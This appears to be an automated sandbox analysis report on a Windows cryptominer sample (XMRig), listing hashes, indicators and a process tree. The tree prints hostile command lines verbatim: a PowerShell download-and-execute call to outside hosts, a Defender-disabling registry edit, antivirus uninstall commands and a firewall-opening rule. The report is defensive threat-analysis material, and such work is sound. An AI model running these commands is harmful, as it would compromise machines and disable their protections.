Analysis
- max time kernel: 123s
- max time network: 118s
- platform: windows7_x64
- resource: win7-en-20211014
- submitted: 01-12-2021 18:08

Static task: static1
Behavioral task: behavioral1
Sample: m2.dat.exe
Resource: win7-en-20211014
General
- Target: m2.dat.exe
- Size: 3.4MB
- MD5: fcfc0feed527d188d6b2ed3445758511
- SHA1: b4198d332b59b303e2dc5df717f2cf408b308f28
- SHA256: 28e5812c8bff42c348a5f25a5f3d871c5b3bbda882da1009db4d25dc974bef0c
- SHA512: af053c75e89e18573161dcd1fcabc3b08998874c5e810bc15bb2a0e5ab0254d06b4ec6defc545fc9dff4fcb94529eb9ea7610ad63233e5d6e191b232c502d3c5
Malware Config
Extracted
http://k2ygoods.ydns.eu/power.txt
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
  resource                          yara_rule
  \Windows\debug\m\winlogon.exe     xmrig
  C:\Windows\debug\m\winlogon.exe   xmrig
  C:\Windows\debug\m\winlogon.exe   xmrig
-
Blocklisted process makes network request 1 IoCs
Processes:
  flow  pid   process
  7     1688  powershell.exe
-
Executes dropped EXE 6 IoCs
Processes:
  pid   process
  2024  lsass.exe
  2040  1sass.exe
  1916  lsass.exe
  1736  1sass.exe
  844   winlogon.exe
  908   csrss.exe
-
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 5 IoCs
Processes:
  pid   process
  924   cmd.exe
  924   cmd.exe
  1916  lsass.exe
  1736  1sass.exe
  1736  1sass.exe
-
Drops file in Windows directory 25 IoCs
Processes:
  description                   ioc                                                      process
  File created                  C:\Windows\debug\__tmp_rar_sfx_access_check_259401270    m2.dat.exe
  File created                  C:\Windows\debug\m\n.vbs                                 m2.dat.exe
  File opened for modification  C:\Windows\debug\m\lsass.exe                             m2.dat.exe
  File opened for modification  C:\Windows\debug\m\winlogon.exe                          attrib.exe
  File created                  C:\Windows\debug\m\winlogon.exe                          m2.dat.exe
  File opened for modification  C:\Windows\debug\m\config.json                           winlogon.exe
  File created                  C:\Windows\debug\m\config.json                           m2.dat.exe
  File opened for modification  C:\Windows\debug\m                                       m2.dat.exe
  File created                  C:\Windows\debug\m\server.reg                            m2.dat.exe
  File opened for modification  C:\Windows\debug\m\WinRing0x64.sys                       m2.dat.exe
  File opened for modification  C:\Windows\debug\m\server2.reg                           m2.dat.exe
  File opened for modification  C:\Windows\debug\m\csrss.exe                             m2.dat.exe
  File opened for modification  C:\Windows\debug\m\config.json                           attrib.exe
  File opened for modification  C:\Windows\debug\m                                       attrib.exe
  File opened for modification  C:\Windows\debug\m\server.reg                            m2.dat.exe
  File created                  C:\Windows\debug\m\WinRing0x64.sys                       m2.dat.exe
  File opened for modification  C:\Windows\debug\m\n.vbs                                 m2.dat.exe
  File created                  C:\Windows\debug\m\c1.bat                                m2.dat.exe
  File created                  C:\Windows\debug\m\lsass.exe                             m2.dat.exe
  File opened for modification  C:\Windows\debug\m\winlogon.exe                          m2.dat.exe
  File opened for modification  C:\Windows\debug\m\config.json                           m2.dat.exe
  File created                  C:\Windows\debug\m\server2.reg                           m2.dat.exe
  File opened for modification  C:\Windows\debug\m\c1.bat                                m2.dat.exe
  File created                  C:\Windows\debug\m\csrss.exe                             m2.dat.exe
  File opened for modification  C:\Windows\debug\m\lsass.exe                             attrib.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
  pid   process
  1480  NETSTAT.EXE
-
Modifies data under HKEY_USERS 2 IoCs
Processes:
  description       ioc                                                                                                                process
  Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage                               powershell.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80c3e166e6e6d701  powershell.exe
-
Runs .reg file with regedit 2 IoCs
Processes:
  pid   process
  832   regedit.exe
  1548  regedit.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
  pid   process
  908   csrss.exe
  908   csrss.exe
  1688  powershell.exe
  1688  powershell.exe
  1736  1sass.exe
  1736  1sass.exe
  1736  1sass.exe
  1736  1sass.exe
  1736  1sass.exe
  1916  lsass.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
  description                           pid   process
  Token: SeLockMemoryPrivilege          844   winlogon.exe
  Token: SeDebugPrivilege               908   csrss.exe
  Token: SeDebugPrivilege               1688  powershell.exe
  Token: SeAssignPrimaryTokenPrivilege  1408  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1408  WMIC.exe
  Token: SeSecurityPrivilege            1408  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1408  WMIC.exe
  Token: SeLoadDriverPrivilege          1408  WMIC.exe
  Token: SeSystemtimePrivilege          1408  WMIC.exe
  Token: SeBackupPrivilege              1408  WMIC.exe
  Token: SeRestorePrivilege             1408  WMIC.exe
  Token: SeShutdownPrivilege            1408  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1408  WMIC.exe
  Token: SeUndockPrivilege              1408  WMIC.exe
  Token: SeManageVolumePrivilege        1408  WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege  1408  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1408  WMIC.exe
  Token: SeSecurityPrivilege            1408  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1408  WMIC.exe
  Token: SeLoadDriverPrivilege          1408  WMIC.exe
  Token: SeSystemtimePrivilege          1408  WMIC.exe
  Token: SeBackupPrivilege              1408  WMIC.exe
  Token: SeRestorePrivilege             1408  WMIC.exe
  Token: SeShutdownPrivilege            1408  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1408  WMIC.exe
  Token: SeUndockPrivilege              1408  WMIC.exe
  Token: SeManageVolumePrivilege        1408  WMIC.exe
  Token: SeRestorePrivilege             112   msiexec.exe
  Token: SeTakeOwnershipPrivilege       112   msiexec.exe
  Token: SeSecurityPrivilege            112   msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege  1620  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1620  WMIC.exe
  Token: SeSecurityPrivilege            1620  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1620  WMIC.exe
  Token: SeLoadDriverPrivilege          1620  WMIC.exe
  Token: SeSystemtimePrivilege          1620  WMIC.exe
  Token: SeBackupPrivilege              1620  WMIC.exe
  Token: SeRestorePrivilege             1620  WMIC.exe
  Token: SeShutdownPrivilege            1620  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1620  WMIC.exe
  Token: SeUndockPrivilege              1620  WMIC.exe
  Token: SeManageVolumePrivilege        1620  WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege  1620  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1620  WMIC.exe
  Token: SeSecurityPrivilege            1620  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1620  WMIC.exe
  Token: SeLoadDriverPrivilege          1620  WMIC.exe
  Token: SeSystemtimePrivilege          1620  WMIC.exe
  Token: SeBackupPrivilege              1620  WMIC.exe
  Token: SeRestorePrivilege             1620  WMIC.exe
  Token: SeShutdownPrivilege            1620  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1620  WMIC.exe
  Token: SeUndockPrivilege              1620  WMIC.exe
  Token: SeManageVolumePrivilege        1620  WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege  1988  WMIC.exe
  Token: SeIncreaseQuotaPrivilege       1988  WMIC.exe
  Token: SeSecurityPrivilege            1988  WMIC.exe
  Token: SeTakeOwnershipPrivilege       1988  WMIC.exe
  Token: SeLoadDriverPrivilege          1988  WMIC.exe
  Token: SeSystemtimePrivilege          1988  WMIC.exe
  Token: SeBackupPrivilege              1988  WMIC.exe
  Token: SeRestorePrivilege             1988  WMIC.exe
  Token: SeShutdownPrivilege            1988  WMIC.exe
  Token: SeSystemEnvironmentPrivilege   1988  WMIC.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
  pid   process
  844   winlogon.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
  description                         pid   process      target process
  PID 1968 wrote to memory of 1488    1968  m2.dat.exe   WScript.exe
  PID 1968 wrote to memory of 1488    1968  m2.dat.exe   WScript.exe
  PID 1968 wrote to memory of 1488    1968  m2.dat.exe   WScript.exe
  PID 1968 wrote to memory of 1488    1968  m2.dat.exe   WScript.exe
  PID 1488 wrote to memory of 924     1488  WScript.exe  cmd.exe
  PID 1488 wrote to memory of 924     1488  WScript.exe  cmd.exe
  PID 1488 wrote to memory of 924     1488  WScript.exe  cmd.exe
  PID 1488 wrote to memory of 924     1488  WScript.exe  cmd.exe
  PID 924 wrote to memory of 2024     924   cmd.exe      lsass.exe
  PID 924 wrote to memory of 2024     924   cmd.exe      lsass.exe
  PID 924 wrote to memory of 2024     924   cmd.exe      lsass.exe
  PID 924 wrote to memory of 2024     924   cmd.exe      lsass.exe
  PID 924 wrote to memory of 832      924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 832      924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 832      924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 832      924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 2040     924   cmd.exe      1sass.exe
  PID 924 wrote to memory of 2040     924   cmd.exe      1sass.exe
  PID 924 wrote to memory of 2040     924   cmd.exe      1sass.exe
  PID 924 wrote to memory of 2040     924   cmd.exe      1sass.exe
  PID 924 wrote to memory of 1548     924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 1548     924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 1548     924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 1548     924   cmd.exe      regedit.exe
  PID 924 wrote to memory of 1164     924   cmd.exe      sc.exe
  PID 924 wrote to memory of 1164     924   cmd.exe      sc.exe
  PID 924 wrote to memory of 1164     924   cmd.exe      sc.exe
  PID 924 wrote to memory of 1164     924   cmd.exe      sc.exe
  PID 924 wrote to memory of 2032     924   cmd.exe      sc.exe
  PID 924 wrote to memory of 2032     924   cmd.exe      sc.exe
  PID 924 wrote to memory of 2032     924   cmd.exe      sc.exe
  PID 924 wrote to memory of 2032     924   cmd.exe      sc.exe
  PID 1916 wrote to memory of 844     1916  lsass.exe    winlogon.exe
  PID 1916 wrote to memory of 844     1916  lsass.exe    winlogon.exe
  PID 1916 wrote to memory of 844     1916  lsass.exe    winlogon.exe
  PID 924 wrote to memory of 1228     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1228     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1228     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1228     924   cmd.exe      attrib.exe
  PID 1736 wrote to memory of 908     1736  1sass.exe    csrss.exe
  PID 1736 wrote to memory of 908     1736  1sass.exe    csrss.exe
  PID 1736 wrote to memory of 908     1736  1sass.exe    csrss.exe
  PID 924 wrote to memory of 1112     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1112     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1112     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1112     924   cmd.exe      attrib.exe
  PID 908 wrote to memory of 1156     908   csrss.exe    cmd.exe
  PID 908 wrote to memory of 1156     908   csrss.exe    cmd.exe
  PID 908 wrote to memory of 1156     908   csrss.exe    cmd.exe
  PID 924 wrote to memory of 1768     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1768     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1768     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1768     924   cmd.exe      attrib.exe
  PID 1156 wrote to memory of 1688    1156  cmd.exe      powershell.exe
  PID 1156 wrote to memory of 1688    1156  cmd.exe      powershell.exe
  PID 1156 wrote to memory of 1688    1156  cmd.exe      powershell.exe
  PID 924 wrote to memory of 1300     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1300     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1300     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1300     924   cmd.exe      attrib.exe
  PID 924 wrote to memory of 1484     924   cmd.exe      netsh.exe
  PID 924 wrote to memory of 1484     924   cmd.exe      netsh.exe
  PID 924 wrote to memory of 1484     924   cmd.exe      netsh.exe
  PID 924 wrote to memory of 1484     924   cmd.exe      netsh.exe
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
  pid   process
  1300  attrib.exe
  1228  attrib.exe
  1112  attrib.exe
  1768  attrib.exe
Processes
(process tree; the number in brackets is the depth in the tree, "cmdline:" is the observed command line)

[1] C:\Users\Admin\AppData\Local\Temp\m2.dat.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\m2.dat.exe"
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\WScript.exe
      cmdline: "C:\Windows\System32\WScript.exe" "C:\Windows\debug\m\n.vbs"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd /c ""C:\Windows\debug\m\c1.bat" "
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\debug\m\lsass.exe
          cmdline: lsass.exe install "Windows Updata" winlogon.exe
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\regedit.exe
          cmdline: C:\Windows\regedit /s server.reg
          - Runs .reg file with regedit
      [4] C:\PerfLogs\Admin\1sass.exe
          cmdline: C:\PerfLogs\Admin\1sass.exe install "Windows Management" C:\PerfLogs\Admin\csrss.exe
          - Executes dropped EXE
      [4] C:\Windows\SysWOW64\regedit.exe
          cmdline: C:\Windows\regedit /s server2.reg
          - Runs .reg file with regedit
      [4] C:\Windows\SysWOW64\sc.exe
          cmdline: sc start "Windows Updata"
      [4] C:\Windows\SysWOW64\sc.exe
          cmdline: sc start "Windows Management"
      [4] C:\Windows\SysWOW64\attrib.exe
          cmdline: attrib C:\Windows\debug\m +h +a
          - Drops file in Windows directory
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\attrib.exe
          cmdline: attrib C:\Windows\debug\m\*.json +h +a +s +r
          - Drops file in Windows directory
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\attrib.exe
          cmdline: attrib C:\Windows\debug\m\*.exe +h +a +s +r
          - Drops file in Windows directory
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\attrib.exe
          cmdline: attrib C:\PerfLogs\Admin\*.exe +h +a +s +r
          - Views/modifies file attributes
      [4] C:\Windows\SysWOW64\netsh.exe
          cmdline: netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow

[1] C:\Windows\debug\m\lsass.exe
    cmdline: C:\Windows\debug\m\lsass.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\debug\m\winlogon.exe
      cmdline: "winlogon.exe"
      - Executes dropped EXE
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow

[1] C:\PerfLogs\Admin\1sass.exe
    cmdline: C:\PerfLogs\Admin\1sass.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\PerfLogs\Admin\csrss.exe
      cmdline: "C:\PerfLogs\Admin\csrss.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        cmdline: cmd.exe /c "powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.ydns.eu/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://2652435.f3322.org/power.txt')"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://k2ygoods.ydns.eu/power.txt')
          - Blocklisted process makes network request
          - Modifies data under HKEY_USERS
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\reg.exe
            cmdline: "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /d 1 /t REG_DWORD /f
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Eset%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%avast%'" call uninstall /nointeractive
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%avp%'" call uninstall /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Security%'" call uninstall /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%AntiVirus%'" call uninstall /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmdline: "C:\Windows\System32\Wbem\WMIC.exe" product where "name like '%Norton Security%'" call uninstall /nointeractive
        [5] C:\Windows\system32\cmd.exe
            cmdline: "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
        [5] C:\Windows\system32\NETSTAT.EXE
            cmdline: "C:\Windows\system32\NETSTAT.EXE" -ano
            - Gathers network information
        [5] C:\Windows\system32\findstr.exe
            cmdline: "C:\Windows\system32\findstr.exe" TCP
        [5] C:\Windows\system32\sc.exe
            cmdline: "C:\Windows\system32\sc.exe" stop "Windows Updata"
        [5] C:\Windows\system32\sc.exe
            cmdline: "C:\Windows\system32\sc.exe" delete "Windows Updata"
        [5] C:\Windows\system32\sc.exe
            cmdline: "C:\Windows\system32\sc.exe" stop "Windows Management"

[1] C:\Windows\system32\msiexec.exe
    cmdline: C:\Windows\system32\msiexec.exe /V
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\wbem\WmiApSrv.exe
    cmdline: C:\Windows\system32\wbem\WmiApSrv.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\PerfLogs\Admin\1sass.exe
  MD5     beceae2fdc4f7729a93e94ac2ccd78cc
  SHA1    47c112c23c7bdf2af24a20bd512f91ff6af76bc6
  SHA256  f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
  SHA512  073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
- C:\PerfLogs\Admin\csrss.exe
  MD5     62e98ca6b2bf484e6fbbc537fd49167a
  SHA1    b8fbfaaeadb02dde6461132bf63a9faa4a89987e
  SHA256  cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
  SHA512  684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
- C:\Windows\debug\m\c1.bat
  MD5     9a412e42384f31ad8c61cbd32076603c
  SHA1    7a1caef46f6c7549ab17d98f1328fff4673cacb2
  SHA256  0ab85d2da0f7a9b644d4b7a964a7b1728d1f9eb716b9abe2f1d9c611d7ee4617
  SHA512  1d9d179db2a8901539f3a7fe6a91d58422cdb6a28dbf53e758e8745881a45304b0037227b9a4d1c04928d14b0014a1bb1c2e6eb53dfa43111eba6bf32da949c6
- C:\Windows\debug\m\config.json
  MD5     c3b273d977023f0309fa7225c73911ed
  SHA1    b667780303d60c649a77e8c2fed970779d8a53cf
  SHA256  3896eedd2bceeca958779c63c3150744c9e2d0160553b4d8a652323fe2b3b5df
  SHA512  38e8e637c58e59577a5e05e05fb6818ccba96b8db2cfda9e8221e1a0665429a321dc3efe603aa37afed7165267060382b213136076ebe3b4c536c8f060f026ea
- C:\Windows\debug\m\config.json
  MD5     62fc8627fd89578bbf0d4dad13d010ce
  SHA1    d58965556828a215684cac6271a88472a37e74f9
  SHA256  5b70dcc71733725215b752a09c7434495554cd0183001af02fda4528425bbdf9
  SHA512  d9596a95e6cd13f745d618fd9865e50a3e04df26d780e4d6c6c9d3d2cac3b825258cb2c80a71922fca099d90605d4dd9de5ed6b91ac324efc3a966e3f43decc9
- C:\Windows\debug\m\csrss.exe
  MD5     62e98ca6b2bf484e6fbbc537fd49167a
  SHA1    b8fbfaaeadb02dde6461132bf63a9faa4a89987e
  SHA256  cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
  SHA512  684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
- C:\Windows\debug\m\lsass.exe
  MD5     beceae2fdc4f7729a93e94ac2ccd78cc
  SHA1    47c112c23c7bdf2af24a20bd512f91ff6af76bc6
  SHA256  f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
  SHA512  073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
- C:\Windows\debug\m\n.vbs
  MD5     c4258287aa2aa93135e6d1462b1cd58f
  SHA1    16bdfae57a969931d2b7321dd48ec39dfbe8be14
  SHA256  cf8417cdc951eed2c10d424b312a0fbf222321e785e655548d9b054a2d87c273
  SHA512  38c701c8f50d35dd8319755d65e74849150bc3402afe2994a0eea9209ffde193ca6301ff28ad4e8b5ddb4cdd916f9a0e7ef4ef7e4e9c8b82ae28a2a3e76d75ba
- C:\Windows\debug\m\server.reg
  MD5     7c2301b0fa96dac6f800704acca36342
  SHA1    d5733429c9acee4e452bae53499fa67309beb855
  SHA256  f9f8291c7d3f5397e249aa6ec402ebc45d47cf455b25588970382048aa67b985
  SHA512  f754c1b848ff6eef49d60096c3a79a9120ddde80d812be2b6b751745cd008c3f2ffd0c82de23852a9153258d43ef8de7e1e30f4598a557ff7809ae476a75922f
- C:\Windows\debug\m\server2.reg
  MD5     41678ca725e5e2964ccfebde111d243a
  SHA1    451890c89b9268a321831ae0ca17cf128c973c2a
  SHA256  1b74416ba48010dad0467ce77f8d1044e75be2dd003a18cdad0d6f2112e3b565
  SHA512  b916c1321f4073da734c31bd6a50f1abb95592a4782977f09d73b986b867a3599f348bfbd3641d204a1882f4e3e84be7eb7254d5e4049e45279088172ab8ddad
- C:\Windows\debug\m\winlogon.exe
  MD5     14404f2edef3c43d318fa8cab21b0ea6
  SHA1    4f86639fd543555ba4604e0acb28c8631fe9c300
  SHA256  65127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
  SHA512  fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
- \PerfLogs\Admin\1sass.exe
  MD5     beceae2fdc4f7729a93e94ac2ccd78cc
  SHA1    47c112c23c7bdf2af24a20bd512f91ff6af76bc6
  SHA256  f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
  SHA512  073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
- \PerfLogs\Admin\csrss.exe
  MD5     62e98ca6b2bf484e6fbbc537fd49167a
  SHA1    b8fbfaaeadb02dde6461132bf63a9faa4a89987e
  SHA256  cbc85816ce4d841628d343113b3ae6843402062835a9da85da1064f58e840517
  SHA512  684cd2a043b71b288a515a8df26e4f374afcec9de9cdb6d80068e24f6eeea7adf9c141e6df172ec4cb2a09edbf3da2a9e0120ff8a086800c52f5c7cc998799d8
- \Windows\debug\m\lsass.exe
  MD5     beceae2fdc4f7729a93e94ac2ccd78cc
  SHA1    47c112c23c7bdf2af24a20bd512f91ff6af76bc6
  SHA256  f689ee9af94b00e9e3f0bb072b34caaf207f32dcb4f5782fc9ca351df9a06c97
  SHA512  073f5ae0d4ffedb5edb3b92b8e19bea2c482a3ad7ab02ed71955d3e55aa44a297307fe4334d28c6f7683cb02d40b4313e560c9049507b16a8c5d6ee0a0f0071f
- \Windows\debug\m\winlogon.exe
  MD5     14404f2edef3c43d318fa8cab21b0ea6
  SHA1    4f86639fd543555ba4604e0acb28c8631fe9c300
  SHA256  65127ac2b7fcda847872fa2314d4ef34620efc6d585551cebf2d4886d657c736
  SHA512  fccd70f3b3162a7f5f1d48fe0066ae0126bfbec92d51eb8b767db2d43ea919e9de9aa292013fc311503c2f567d1884143e08420048321ac0447771c3ad368624
Memory dumps
- memory/512-119-0x0000000000000000-mapping.dmp
- memory/572-116-0x0000000000000000-mapping.dmp
- memory/696-114-0x0000000000000000-mapping.dmp
- memory/768-108-0x0000000000000000-mapping.dmp
- memory/832-64-0x0000000000000000-mapping.dmp
- memory/844-80-0x0000000000000000-mapping.dmp
- memory/844-104-0x0000000000C80000-0x0000000000CA0000-memory.dmp (Filesize 128KB)
- memory/844-105-0x0000000000CA0000-0x0000000000CC0000-memory.dmp (Filesize 128KB)
- memory/844-83-0x0000000000110000-0x0000000000130000-memory.dmp (Filesize 128KB)
- memory/908-87-0x0000000000000000-mapping.dmp
- memory/924-60-0x0000000000000000-mapping.dmp
- memory/1112-90-0x0000000000000000-mapping.dmp
- memory/1156-91-0x0000000000000000-mapping.dmp
- memory/1164-75-0x0000000000000000-mapping.dmp
- memory/1188-117-0x0000000000000000-mapping.dmp
- memory/1228-81-0x0000000000000000-mapping.dmp
- memory/1252-113-0x0000000000000000-mapping.dmp
- memory/1300-96-0x0000000000000000-mapping.dmp
- memory/1408-109-0x0000000000000000-mapping.dmp
- memory/1480-118-0x0000000000000000-mapping.dmp
- memory/1484-122-0x0000000000000000-mapping.dmp
- memory/1484-98-0x0000000000000000-mapping.dmp
- memory/1488-56-0x0000000000000000-mapping.dmp
- memory/1548-72-0x0000000000000000-mapping.dmp
- memory/1620-111-0x0000000000000000-mapping.dmp
- memory/1628-121-0x0000000000000000-mapping.dmp
- memory/1660-115-0x0000000000000000-mapping.dmp
- memory/1688-102-0x00000000011D2000-0x00000000011D4000-memory.dmp (Filesize 8KB)
- memory/1688-99-0x000007FEFB6C1000-0x000007FEFB6C3000-memory.dmp (Filesize 8KB)
- memory/1688-101-0x00000000011D0000-0x00000000011D2000-memory.dmp (Filesize 8KB)
- memory/1688-103-0x00000000011D4000-0x00000000011D7000-memory.dmp (Filesize 12KB)
- memory/1688-106-0x00000000011DB000-0x00000000011FA000-memory.dmp (Filesize 124KB)
- memory/1688-94-0x0000000000000000-mapping.dmp
- memory/1688-100-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp (Filesize 11.4MB)
- memory/1768-93-0x0000000000000000-mapping.dmp
- memory/1968-55-0x0000000075F41000-0x0000000075F43000-memory.dmp (Filesize 8KB)
- memory/1988-112-0x0000000000000000-mapping.dmp
- memory/2024-62-0x0000000000000000-mapping.dmp
- memory/2032-77-0x0000000000000000-mapping.dmp
- memory/2040-70-0x0000000000000000-mapping.dmp
- memory/2040-120-0x0000000000000000-mapping.dmp